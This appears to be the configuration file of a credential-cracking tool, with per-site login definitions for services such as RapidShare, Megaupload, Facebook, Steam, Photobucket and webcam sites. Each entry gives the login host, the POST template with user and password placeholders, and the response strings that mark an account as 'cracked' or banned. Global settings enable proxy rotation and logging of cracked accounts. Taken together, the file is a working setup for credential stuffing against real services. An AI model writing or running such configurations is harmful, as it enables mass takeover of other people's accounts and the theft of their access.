[settings]
Logins=RSAPI,MU,NL,DF,UT,HF,BAD,C4,IL,FF,MF,MFC,ST,PB,FB,SM,ULCOM,MC,PL
Sockets=20
Timeout=12000
Version=1.0.0
Casing=1
UseProxies=False
UseSOCKS=False
LogProxies=True
LogCracked=True
NameAsPass=True
DBFormatDash=False
ReversePass=False
UseEmailExtensions=False
Remember=True
PlaySound=True
SendToTray=True
FinishShutdownPC=False
FinshCloseApex=False
CheckForUpdates=False
CrackingStyle=0
Site=8
lngUsersIndex=0
intProxiesIndex=1209
TempPassIndex=-1
FinshShutdownPC=False
FinishCloseApex=False
PlaySound=False
SendToTray=False
intPasswordsIndex=-1
intEmailExtensionsIndex=-1
TempEmailExtensionsIndex=-1
DBFormatColon=False
RemoveLetters=False
RemoveSymbols=False
RemoveNumbers=False
SkipPassLength=0
SkipPassWithSpace=False
StopAtCrackedAmount=0
UseSafeConnections=True
UseMiniMode=False
UseCustomCrackedSound=False
UseCompleteSound=False
lstProxies=C:\Users\Mamacita\Desktop\NewApexProxies.txt

[RS]
Name=RapidShare
UseProxies=True
Host=rapidshare.com
UsePost=False
GetPage=/cgi-bin/premium.cgi?accountid=[user]&password=[pass]&premiumlogin=1&ru=1
CrackedString=charset=UTF-8\r\nContent-Length: 10
InvalidString=ERROR=Wrong password||ERROR=Account not found.||if (top != self)   top.location = self.location;
UseEmails=False

[RSAPI]
Name=RapidShare 2
Host=rapidshare.com
UseProxies=True
UsePost=False
GetPage=/cgi-bin/premium.cgi?accountid=[user]&password=[pass]&premiumlogin=1
CrackedString=The Account is valid
BannedString=IP blocked
InvalidString=enc=;||How to use RapidShare?
UseEmails=False

[RSC]
Name=RapidShare Collectors
UseProxies=TRUE
Host=api.rapidshare.com
UsePost=FALSe
GetPage=/cgi-bin/rsapi.cgi?sub=getaccountdetails_v1&type=col&login=[user]&password=[pass]
CrackedString=rsantihack=
InvalidString=ERROR: Lo||1-Click web hosting

[MU]
Name=Megaupload
UseProxies=True
Host=www.megaupload.com
UsePost=True
PostPage=/?c=login
PostString=login=1&redir=1&username=[user]&password=[pass]
CrackedString=Set-Cookie: user=
InvalidString= MEGAUPLOAD - The
BannedString=
UseEmails=False

[NL]
Name=Netload
UseProxies=FALSE
Host=netload.in
UsePost=TRUE
PostString=txtuser=[user]&txtpass=[pass]&txtcheck=login&txtlogin=
PostPage=/index.php
CrackedString=Set-Cookie: cookie_user=
InvalidString=Location: /index.php?id=15
GetPage=

[DF]
Name=Deposit Files
UseProxies=True
Host=depositfiles.com
UsePost=True
PostString=go=1&login=[user]&password=[pass]
PostPage=/en/login.php?return=%2Fen%2F
CrackedString=Set-Cookie: autologin=
InvalidString=Server: nginx
BannedString=
UseEmails=False

[UT]
Name=uploaded.to
UseProxies=False
Host=uploaded.to
UsePost=True
PostString=email=[user]&password=[pass]
PostPage=/login
Crackedstring=Set-Cookie: auth=
InvalidString=
Referer=http://uploaded.to/login
UseEmails=False

[HF]
Name=Hotfile.com
UseProxies=False
Host=hotfile.com
UsePost=True
PostString=returnto=%2F&user=[user]&pass=[pass]
PostPage=/login.php
CrackedString=
InvalidString=<title>Hotfile.com
BannedString=
UseEmails=False

[BAD]
Name=Badongo.com
UseProxies=FALSE
Host=www.badongo.com
UsePost=TRUE
PostString=username=[user]&password=[pass]&cap_id=&cap_secret=c17f254bcdb8091e041362993894ba20&bk=&do=login&cou=en&no_ssl=1
PostPage=/login
CrackedString=Set-Cookie: badongoU=
InvalidString=Set-Cookie: badongoL=en;
GetPage=

[ES]
Name=Easy-Share.com
UseProxies=TRUE
Host=www.easy-share.com
UsePost=TRUE
PostString=login=[user]&password=[pass]&remember=1
PostPage=/accounts/login
CrackedString=Set-Cookie: account=1
InvalidString=Content-Length: 1
GetPage=

[zS]
Name=zShare.net
UseProxies=FALSE
Host=zshare.net
UsePost=TRUE
PostString=username=[user]&password=[pass]&submit=Login
PostPage=/myzshare/process.php?loc=http://zshare.net/myzshare/login.php
CrackedString=fsafsafasfas
InvalidString=login.php?msg=
GetPage=

[C4]
Name=Cam4
UseProxies=FALSE
Host=cam4.com
UsePost=TRUE
PostString=username=[user]&password=[pass]&submit=login
PostPage=/login/
CrackedString=HTTP/1.1 302
InvalidString=Server: Apache-Coyote/1.1
GetPage=

[SS]
Name=SendSpace
UseProxies=FALSE
Host=sendspace.com
UsePost=TRUE
PostString=action=login&username=[user]&password=[pass]&remember=1&submit=login&openid_url=&action_type=login
PostPage=/login.html
CrackedString=HTTP/1.1 302
InvalidString=HTTP/1.1 200
GetPage=
Cookie=SID=9caada16d1132fa1c4f51b29011cab19; ssui=d5e1bbae3d55e60b955e623d7bf27afb


[IL]
Name=ImLive
UseProxies=False
Host=imlive.com
UsePost=TRUE
PostString=txtUsername=[user]&txtPassword=[pass]&func=log&Submit1=GO
PostPage=/members.aspx
CrackedString=HTTP/1.1 200
InvalidString=?errorid=
GetPage=
Cookie=ASP.NET_SessionId=zteb2o455i42ip551qfacqvs; imlv=d1L8nYGrPxxKfmvRaNCT6s6MpjdKe%2bsvHgUcdJmSzWUBnG0bLGCR8Ru4M1XV9pVGZQrsPdJNJ9vMSxzItrTNrXolU9EVmQLB4YN904OKnr0%3d

[FF]
Name=FileFactory
UseProxies=False
Host=filefactory.com
UsePost=TRUE
PostString=email=[user]&password=[pass]&redirect=%2F%3Flogout%3D1%26
PostPage=/member/login.php?
Crackedstring=Set-Cookie: ff_membership=
InvalidString=Location: /member/login.php?err=1
UseEmails=TRUE

[MF]
Name=MediaFire
UseProxies=False
Host=mediafire.com
UsePost=TRUE
PostString=login_email=[user]&login_pass=[pass]&login_remember=on&submit_login=Login+to+MediaFire
PostPage=/dynamic/login.php
Crackedstring=Set-Cookie: user
InvalidString=<title>MediaFire</title>
Cookie=ukey=b9vlx52j52ll29wclhljxllwhxbl2lvw
UseEmails=TRUE

[MFC]
Name=MyFreeCams
UseProxies=True
Host=dev.myfreecams.com
UsePost=True
UseProxies=TRUE
PostPage=/mfc2/php/account.php
PostString=username=[user]+++&password=[pass]&screen_size=&uid=&model_id=&uid=&submit_login=Login+To+Your+Account
CrackedString=Cache-Control: private&&src=/mfc2/lib/
InvalidString=src=/mfc2/lib/
BannedString=
UseEmails=True
GetPage=

[FB]
Name=Facebook
UseProxies=False
Host=m.facebook.com
UsePost=True
PostPage=/login.php
PostString=email=[user]&pass=[pass]&login=Log+In
CrackedString=Location: /home.php
InvalidString=Set-Cookie: reg_fb_ref=
BannedString=
UseEmails=False

[ST]
Name=storage.to
Host=storage.to
UseProxies=False
UsePost=True
PostPage=/login
PostString=email=[user]&password=[pass]&=Login
CrackedString=Login successful
BannedString=
InvalidString=Password
UseEmails=True

[PB]
Name=Photobucket
Host=photobucket.com
UseProxies=False
UsePost=True
PostPage=/login
PostString=loginForm%5Bredir%5D=&loginForm%5BredirectAction%5D=&loginForm%5BredirectParams%5D=&loginForm%5BreturnUrl%5D=&action=login&loginForm%5Busernameemail%5D=[user]&loginForm%5Bpassword%5D=[pass]
CrackedString=pbauth=
BannedString=
InvalidString=Location: /
UseEmails=False
[ProjectW]
Name=ProjectW
Host=projectw.org
UseProxies=False
UsePost=True
PostPage=/ucp.php?mode=login
PostString=username=[user]&password=[pass]&redirect=index.php&login=Login
CrackedString=Set-Cookie: pw_u=
BannedString=
InvalidString=200 OK
UseEmails=False

[Cz]
Name=Codersz
Host=codersz.com
UseProxies=False
UsePost=True
PostPage=/login/
PostString=form_sent=1&redirect_url=http%3A%2F%2Fcodersz.com%2F&csrf_token=0a995d926019a5bbcf70d4db13c32a2313de2950&req_username=[user]&req_password=[pass]&login=Login
CrackedString=Set-Cookie
BannedString=
InvalidString=200 OK
UseEmails=False

[YTT]
Name=YouTube Test
Host=www.youtube.com
UseProxies=True
UsePost=False
GetPage=/watch?v=DIVhVTBrsyY
CrackedString=dsadasdasdasd
BannedString=
InvalidString=YouTube
UseEmails=False

[Lockerz]
Name=Lockerz
Host=www.lockerz.com
UseProxies=True
UsePost=True
PostPage=/auth/login
PostString=remember+me=on&handle=[user]&password=[pass]
CrackedString=http://www.lockerz.com/myLocker
BannedString=
InvalidString=Location: http://www.lockerz.com/
UseEmails=True

[YT]
Name=Youtube
UseProxies=True
Host=www.google.com        
UsePost=True
PostPage=/accounts/ServiceLoginAuth?service=youtube        
PostString=youtube&dsh=-3042262685148471858&GALX=yVT6nyDsNJQ&Email=[user]&Passwd=[pass]&PersistentCookie=yes&rmShown=1&signIn=Sign+in&asts=
CrackedString=use_hitbox=
InvalidString=The username or
BannedString=
UseEmails=False
Cookie=LOGIN_INFO=
GetPage=/signin?action_handle_legacy_signin=true&lauth=
[Login16]
Name=Fuck
Host=codersz.com
UseProxies=False
UsePost=True
GetPage=
PostPage=/login/
PostString=form_sent=1&redirect_url=http%3A%2F%2Fcodersz.com%2F&csrf_token=0a995d926019a5bbcf70d4db13c32a2313de2950&req_username=[user]&req_password=[pass]&login=Login
CrackedString=Set-Cookie
BannedString=
InvalidString=200 OK
UseEmails=False

[Login21]
Name=Steam.com
Host=www.store.steampowered.com
UseProxies=True
UsePost=True
GetPage=
PostPage=/login/
PostString=redir=&username=[user]&password=[pass]
CrackedString=/logout/
BannedString=
InvalidString=200 OK
UseEmails=False

[SM]
Name=Steam.com
Host=store.steampowered.com
UseProxies=True
UsePost=True
PostPage=/login/
PostString=redir=&username=[user]&password=[pass]
CrackedString=Set-Cookie: steamLogin=
BannedString=
InvalidString=Location: https://store
UseEmails=False
[ULCOM]
Name=ULCOM
Host=www.uploading.com
UseProxies=False
UsePost=True
PostPage=/general/login_form/?JsHttpRequest=12680290674640-xml
PostString=email=[user]&password=[pass]&remember=on
CrackedString=
BannedString=
InvalidString=200 OK
Cookie=__utma=187202924.383126748.1268028964.1268028964.1268028964.1; __utmb=187202924.1.10.1268028964; __utmc=187202924; __utmz=187202924.1268028964.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
UseEmails=False

[PL]
Host=www.putlocker.com
UseProxies=True
UsePost=True
PostPage=/authenticate.php?login
PostString=user=[user]&pass=[pass]&remember=1&login_submit=Login
CrackedString=cp.php
BannedString=
InvalidString=<input type="submit" name="login_submit"
UseEmails=False
Name=Putlocker

